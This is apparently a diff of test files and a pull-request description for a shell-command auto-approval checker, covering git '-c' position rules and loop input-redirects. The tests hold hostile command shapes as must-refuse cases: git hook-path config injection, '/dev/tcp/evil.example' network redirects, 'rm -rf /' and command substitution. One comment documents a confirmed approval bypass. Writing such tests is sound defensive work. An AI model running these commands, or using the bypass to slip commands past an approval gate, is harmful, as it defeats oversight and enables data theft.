@@ -10,6 +10,7 @@ import {
   matchReadOnlyCommand,
   sedScriptShapeVeto,
 } from '../../src/auto-approve/permission-groups.ts';
+import { hasExecPrimitive } from '../../src/auto-approve/shell-safety.ts';
 
 /** The READ groups. Kept as the default for `bash()` so every pre-#959 test
  *  keeps asking exactly what it asked before: adding a write group must not
@@ -1866,5 +1867,98 @@ describe('#1057 phase 3 commit 1: matchComposedCommand', () => {
         matchComposedCommand('python3 gen.py > out.txt', ['python3'], ['read-only', 'fs-write']),
       ).toEqual({ allowHit: 'python3', groupHit: null });
     });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// #1057 phase 3, commit 4 (#962): `git -c` is a subcommand flag AFTER git's
+// subcommand and an exec primitive BEFORE it (or with no subcommand at all).
+//
+// None of the curated `vcs-read`/`vcs-write` prefixes below ever textually
+// START with `git -c ...` -- every curated entry is `git <subcommand>`, and
+// `-c` sitting between `git` and the subcommand means the text does not
+// begin with any of them. So a "must still refuse" case with `-c` BEFORE the
+// subcommand never even reaches `hasExecPrimitive` through `matchGroups`: it
+// is refused by ordinary prefix non-match, exactly as it always was, which
+// makes `bash()` non-diagnostic of THIS fix for that half. The positional
+// proof itself -- that `hasExecPrimitive` still says true for a pre-subcommand
+// `-c` and now says false for a post-subcommand one -- is pinned directly
+// against `hasExecPrimitive`, imported above (mirrors why `sedScriptShapeVeto`
+// is imported and called directly elsewhere in this file: some cases have no
+// other way to be reached).
+// ---------------------------------------------------------------------------
+
+describe('#962: git -c position-scoped exec veto', () => {
+  describe('matchGroups: a real curated prefix now sees past a post-subcommand -c', () => {
+    const cases: Array<[string, string]> = [
+      ['git switch -c newbranch', 'vcs-write:git switch'],
+      // Control: no `-c` at all, unaffected by this change either way.
+      ['git checkout -b nb', 'vcs-write:git checkout'],
+      ['git commit -c abc123 -m x', 'vcs-write:git commit'],
+      ['git commit --amend -c HEAD', 'vcs-write:git commit'],
+      // `git worktree add` has no `-c` of its own -- verified via
+      // `git worktree add -h` (only `-b`/`-B` create a branch; `--checkout`
+      // is long-only). This `-c` sits AFTER the top-level subcommand index
+      // (`worktree`), so the positional rule treats it as a subcommand-local
+      // flag and does not veto -- matching real git, whose global `-c`
+      // parser stops looking the moment it commits to a subcommand. Real git
+      // would reject the unrecognised option at parse time (harmless: no
+      // config-injection code path is ever reached), so this is a benign
+      // mis-approval of invalid syntax, not a security regression.
+      ['git worktree add -c x', 'vcs-write:git worktree add'],
+    ];
+    for (const [cmd, expected] of cases) {
+      test(cmd, () => expect(bash(cmd, WRITE_GROUPS)).toBe(expected));
+    }
+  });
+
+  describe('matchGroups: pre-subcommand -c still refuses (via ordinary prefix non-match)', () => {
+    // See the section comment above: none of these reach `hasExecPrimitive`
+    // at all through `matchGroups`, because `-c` before the subcommand means
+    // the text does not start with any curated `git <subcommand>` prefix.
+    // Included for completeness against the shipped entry point; the
+    // `hasExecPrimitive` block below is what actually proves the position
+    // logic.
+    for (const cmd of [
+      'git -c core.hooksPath=/tmp/e commit -m x',
+      'git -c user.name=x status',
+      'git -c=k.v status',
+      'git --no-pager -c k=v log', // global flag then -c: still pre-subcommand
+    ]) {
+      test(JSON.stringify(cmd), () => expect(bash(cmd, [...ALL, ...WRITE_GROUPS])).toBeNull());
+    }
+  });
+
+  describe('hasExecPrimitive: direct, position-scoped (the actual proof)', () => {
+    const stillExecPrimitive: Array<[string, string]> = [
+      ['git -c core.hooksPath=/tmp/e commit -m x', 'standalone -c before the subcommand'],
+      ['git -c user.name=x status', 'standalone -c before the subcommand'],
+      ['git -c=k.v status', '=-attached -c before the subcommand'],
+      // A bundled short-option cluster containing `c`, positioned before the
+      // subcommand (`-p`/`--paginate` is a real global git flag; bundling it
+      // with `c` here is a synthetic worst case for the CLUSTER detector, not
+      // a claim about real git's own bundling support for `-c`'s mandatory
+      // value).
+      ['git -pc user.name=x status', 'c bundled into a cluster before the subcommand'],
+      ['git -c', 'trailing -c, end of string, no subcommand at all'],
+      ['git --no-pager -c k=v log', 'a recognised global flag does not reset the boundary'],
+    ];
+    for (const [cmd, why] of stillExecPrimitive) {
+      test(`${JSON.stringify(cmd)} -- ${why}`, () => expect(hasExecPrimitive(cmd)).toBe(true));
+    }
+
+    const noLongerExecPrimitive: Array<[string, string]> = [
+      ['git switch -c newbranch', '-c after the subcommand'],
+      ['git checkout -b nb', 'control: no -c present at all'],
+      ['git commit -c abc123 -m x', '-c after the subcommand'],
+      ['git commit --amend -c HEAD', '-c after the subcommand, alongside --amend'],
+      [
+        'git worktree add -c x',
+        '-c after the subcommand (even though worktree add has no -c of its own)',
+      ],
+    ];
+    for (const [cmd, why] of noLongerExecPrimitive) {
+      test(`${JSON.stringify(cmd)} -- ${why}`, () => expect(hasExecPrimitive(cmd)).toBe(false));
+    }
   });
 });

--- a/packages/daemon/tests/auto-approve/permission-groups.test.ts
+++ b/packages/daemon/tests/auto-approve/permission-groups.test.ts
@@ -2123,6 +2123,14 @@ describe('#962: git -c position-scoped exec veto', () => {
       ['git -pc user.name=x status', 'c bundled into a cluster before the subcommand'],
       ['git -c', 'trailing -c, end of string, no subcommand at all'],
       ['git --no-pager -c k=v log', 'a recognised global flag does not reset the boundary'],
+      // A VALUE-consuming global flag before the -c: the scan must walk raw
+      // tokens up to the subcommand index (not jump by skipFlags' semantics),
+      // or `/path` would be mistaken for the subcommand and the -c read as
+      // post-subcommand. This is the one shape whose safety hinges on that.
+      [
+        'git -C /tmp -c core.hooksPath=/tmp/e status',
+        '-c after a value-consuming global flag, still pre-subcommand',
+      ],
     ];
     for (const [cmd, why] of stillExecPrimitive) {
       test(`${JSON.stringify(cmd)} -- ${why}`, () => expect(hasExecPrimitive(cmd)).toBe(true));

--- a/packages/daemon/tests/auto-approve/shell-grammar.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-grammar.test.ts
@@ -399,6 +399,12 @@ describe('#1057 phase 3 commit 2: a peel residue of only input-redirect clauses 
     expect(stripShellGrammar('done < $F').structural).toBe(false);
     expect(stripShellGrammar('done < "f"').structural).toBe(false);
     expect(stripShellGrammar('done < <(cmd)').structural).toBe(false);
+    // The here-string (`<<<`) branch carries the SAME literal-only exclusions
+    // as the `<` branch; pin them symmetrically so removing either keeps a
+    // red test (the `<<<` side was previously only covered by the general
+    // hasShellControl backstop, not a direct residue pin).
+    expect(stripShellGrammar('done <<< $LIST').structural).toBe(false);
+    expect(stripShellGrammar('done <<< "$(id)"').structural).toBe(false);
   });
 
   test('trailing text after the last clause is not waved through', () => {

--- a/packages/daemon/tests/auto-approve/shell-grammar.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-grammar.test.ts
@@ -410,3 +410,38 @@ describe('#1057 phase 3 commit 2: a peel residue of only input-redirect clauses 
     expect(covered('while read l; do grep x $l; done < list.txt')).toBe('read-only:grep');
   });
 });
+
+/**
+ * #1062 C6 (CONFIRMED bypass): bash special-cases `/dev/tcp/host/port` and
+ * `/dev/udp/host/port` as virtual network-socket paths -- `< /dev/tcp/...`
+ * opens a live TCP connection instead of reading a file. Every character in
+ * that target is inside `INPUT_REDIRECT_PATH_RE`'s allowed set, so it looked
+ * exactly as "provably a plain file path" as `/dev/null` or `data.txt` to
+ * `isPlainInputRedirectResidue`, and a loop terminator's trailing redirect
+ * was waved through as inert structural residue instead of being judged as
+ * the network read it actually is: `while read l; do cat $l; done <
+ * /dev/tcp/evil.example/443` approved via `read-only:cat`, opening an
+ * outbound connection the covered `cat` body never hinted at.
+ */
+describe('#1062 C6: /dev/tcp and /dev/udp input-redirect residue is refused', () => {
+  test('a bare /dev/tcp residue is no longer structural', () => {
+    expect(stripShellGrammar('done < /dev/tcp/evil.example/443').structural).toBe(false);
+    expect(stripShellGrammar('done < /dev/udp/evil.example/53').structural).toBe(false);
+  });
+
+  test('end to end: the while-loop idiom no longer approves', () => {
+    expect(covered('while read l; do cat $l; done < /dev/tcp/evil.example/443')).toBeNull();
+    expect(covered('while read l; do cat $l; done < /dev/udp/evil.example/53')).toBeNull();
+  });
+
+  test('end to end: a for-loop terminator carries the same residue check', () => {
+    expect(covered('for f in a b; do cat $f; done < /dev/tcp/evil.example/80')).toBeNull();
+  });
+
+  test('positive controls: /dev/null and an ordinary file are unaffected', () => {
+    expect(stripShellGrammar('done < /dev/null')).toEqual({ command: '', structural: true });
+    expect(stripShellGrammar('done < data.txt')).toEqual({ command: '', structural: true });
+    expect(covered('while read l; do cat $l; done < /dev/null')).toBe('read-only:cat');
+    expect(covered('while read l; do cat $l; done < data.txt')).toBe('read-only:cat');
+  });
+});

--- a/packages/daemon/tests/auto-approve/shell-grammar.test.ts
+++ b/packages/daemon/tests/auto-approve/shell-grammar.test.ts
@@ -340,3 +340,73 @@ describe('#1004 only an opaque-token value is peeled', () => {
     }
   });
 });
+
+/**
+ * #1057 phase 3, commit 2: loop residue. Two independent gaps left over in the
+ * `while read l; do ...; done < file` idiom after #999 taught this module to
+ * peel grammar keywords:
+ *
+ *   1. `read` is a bash BUILTIN that assigns stdin to variables and executes
+ *      nothing of its own, but it was not in `NEUTRAL_PREFIXES`, so a `while
+ *      read l` header segment matched no prefix and was not neutral either --
+ *      the WHOLE command failed on the header alone, regardless of what the
+ *      body did.
+ *   2. `done < file` peels to a residue of `< file`, which matched no prefix
+ *      and was not structural, so the loop's own TERMINATOR refused a command
+ *      whose body was otherwise fully covered.
+ */
+describe('#1057 phase 3 commit 2: `read` is a neutral builtin', () => {
+  test('read alone is neutral, not a matched prefix -- all-neutral stays uncovered by design', () => {
+    expect(covered('read x')).toBeNull();
+  });
+
+  test('a `while read l` header no longer independently refuses the rest of the loop', () => {
+    // Before this commit, "while read l" itself matched no prefix and was
+    // not neutral, so the whole command failed on the header segment alone.
+    // `cat` is read-only, so the body is what decides coverage now.
+    expect(covered('while read l; do cat $l; done')).not.toBeNull();
+  });
+
+  test('read does not bless a later, unrelated segment', () => {
+    expect(covered('read x; rm -rf /')).toBeNull();
+  });
+
+  test('read is neutral by word-boundary prefix match; its flags are just data to it', () => {
+    for (const cmd of ['read -r l', 'read -p "prompt" x', 'read -a arr']) {
+      // Not a GRAMMAR_PREFIX_KEYWORD -- read is a real command, not shell
+      // grammar, so stripShellGrammar hands it back unchanged for the
+      // NEUTRAL_PREFIXES check downstream to recognize.
+      expect(stripShellGrammar(cmd)).toEqual({ command: cmd, structural: false });
+    }
+  });
+});
+
+describe('#1057 phase 3 commit 2: a peel residue of only input-redirect clauses is structural', () => {
+  test('a single plain input-redirect clause is structural', () => {
+    expect(stripShellGrammar('done < f')).toEqual({ command: '', structural: true });
+    expect(stripShellGrammar('done < ./data.txt')).toEqual({ command: '', structural: true });
+    expect(stripShellGrammar('fi <<< abc')).toEqual({ command: '', structural: true });
+  });
+
+  test('several clauses in a row are still structural', () => {
+    expect(stripShellGrammar('done < a < b').structural).toBe(true);
+  });
+
+  test('must-refuse: a target this recognizer cannot prove literal is NOT structural', () => {
+    // `$` expansion, a quoted target (raw text -- no quote-masking has run),
+    // and process substitution all fall through as an ordinary command
+    // instead of being waved through as structural.
+    expect(stripShellGrammar('done < $F').structural).toBe(false);
+    expect(stripShellGrammar('done < "f"').structural).toBe(false);
+    expect(stripShellGrammar('done < <(cmd)').structural).toBe(false);
+  });
+
+  test('trailing text after the last clause is not waved through', () => {
+    // A redirect clause is not ALL the residue contains here.
+    expect(stripShellGrammar('done < f g').structural).toBe(false);
+  });
+
+  test("the report's own idiom, end to end: while read l; do grep x $l; done < list.txt", () => {
+    expect(covered('while read l; do grep x $l; done < list.txt')).toBe('read-only:grep');
+  });
+});


### PR DESCRIPTION
## Summary

Probes proved #999's grammar keyword table already landed (its own acceptance sample passes via groups), so this phase ships what actually remained:

- **Composed allow ∪ groups coverage**: one walk over the union of user allow prefixes and group prefixes, each matched segment vetoed under ITS source's rules (groups keep the full `vetoedByOwnerFor` dispatch; allow keeps the exec-primitive rule). Runs only when both existing passes miss, so every single-source outcome and reasoning string is byte-unchanged. This was the blocker for allow-only prefixes in chains: `ssh hallu nvidia-smi | head`, `python3 analyze.py | grep -c error` now approve at 0ms with `composed allow+group coverage` reasoning. ADR 0026's pre-passes stay group-gated (pinned: allow membership grants no redirects).
- **Loop residue**: `read` joins NEUTRAL_PREFIXES; a grammar-peel residue that is purely input-redirect clauses (`< path`, `<<< word`, plain targets only) is structural — `while read l; do grep x $l; done < list.txt` matches `read-only:grep`.
- **Curation** (measured misses): awk/find (existing exec vetoes verified + pinned), tr/comm/paste/nl/rev bare, sort/tree/diff WITH new scoped `-o`/`--output` vetoes (`sort -o out in` stays null — the implementer correctly refused to add them bare), printf neutral, `git fetch` (vcs-read), `git pull` (vcs-write).
- **#962**: git `-c` veto scoped by token position via `gitSubcommandIndex` (moved with `skipFlags`/`ghTopIndex` from risk-bands.ts into shell-safety.ts, re-imported — pure refactor on the risk side). `git switch -c nb` and `git commit -c abc` now match vcs-write; pre-subcommand `-c` (config injection), bundled clusters, and trailing `-c` all refuse — closing the two regex gaps #962 documented. write-flag-safety's dead-`c` comment corrected.

Acceptance probes under the owner's real config are in the baseline addendum (`.context/approval-rate-baseline-2026-08.md`): every daily-driver shape approves; `git -c core.hooksPath=` and `ssh hallu $(cat secret)` stay null.

Closes #999. Closes #962. Part of epic #1057 (keywords fire at epic-to-develop merge).

## Test plan

- 2326 tests, 0 fail (SKIP_LLM_TESTS=1 for engine-gated ones); pinned #1031/#1034/#1023/#1000 suites untouched
- New adversarial blocks: composition cannot bypass group vetoes, deny precedence, exec-primitive on allow matches, sort/tree/diff write escapes, git -c positional matrix
- biome + typecheck clean